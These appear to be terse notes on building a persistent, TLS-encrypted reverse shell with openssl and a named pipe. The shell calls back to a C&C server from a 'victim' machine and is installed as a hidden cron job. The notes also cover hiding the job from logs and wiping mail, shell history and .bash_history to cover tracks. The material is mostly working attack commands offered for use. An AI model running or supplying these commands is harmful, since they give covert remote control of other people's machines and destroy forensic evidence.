The problem is that after a while, the connection might be lost and the process is stuck there so it does not get re-initialized by the cron job. This is why we start by killing it.
Sheebang is required otherwise job control job decent shell env is missing.
We tried bringing the bash/openssl process into background but the script fails to run correctly in that situation. Anyways it’s best to keep that last rm so when ever the reverse shell fails to run (C&C is inactive), there will be no relying and strange named pipe file into /tmp/ or /var/tmp/.
Warning: we cannot simply use run-parts hourly cron jobs because it finally ends-up sending an email when the connection got interrupted. Better setup the cron job manually.
as user
cd ~/
openssl req -x509 -newkey rsa:2048 -keyout self.key -out self.crt -days 9999 -nodes
openssl s_server -quiet -key self.key -cert self.crt -port 8443 \
-CAfile selfy.crt -Verify 0 -verify_return_error
note the upcase V for Verify here, forces client certificate check.
you can also setup a screenrc dotfile for that purpose
screen -t "victim1" 1 $HOME/victim1
openssl req -x509 -newkey rsa:2048 -keyout selfy.key -out selfy.crt -days 9999 -nodes
CC=SERVER-ADDRESS
nmap -p 8443 $CC
/usr/bin/pkill openssl
/bin/rm -f /var/tmp/s
/bin/mkfifo /var/tmp/s
/bin/bash -i < /var/tmp/s 2>&1 \
| /usr/bin/openssl s_client -quiet -connect $CC:8443 \
-cert /var/tmp/selfy.crt -key /var/tmp/selfy.key \
-CAfile /var/tmp/self.crt -verify 0 -verify_return_error \
> /var/tmp/s 2>/dev/null
/bin/rm -f /var/tmp/s
Note openssl’s stderr goes to null and that’s fine.
eventually put this as an executable watchdog
crontab -e -u THAT-USER
for testing
* * * * * /path/to/somehiddenfile
you should be able to read the output as local mail. then once switched to production, there should be no logs at all, not even a cronjob mentioned
*/5 * * * * /path/to/somehiddenfile >/dev/null 2>&1
wait for a while and you will get the shell
echo lala > /dev/stdout echo lala > /dev/stderr
cd ~/ ls -alhtrF | tail ls -alhF mail/ rm -rf mail/ .addressbook .pine* grep '^From ' /var/mail/root | tail -2 history -c rm -f .bash_history
we would need a login shell and the fact that it gets executed from a cron job hinders it. the -i argument to Bash apparently does not help. we get this at CC’s side
bash: cannot set terminal process group (3852): Inappropriate ioctl for device bash: no job control in this shell
eventually pin client certificate using TPM
https://medium.com/@int0x33/day-43-reverse-shell-with-openssl-1ee2574aa998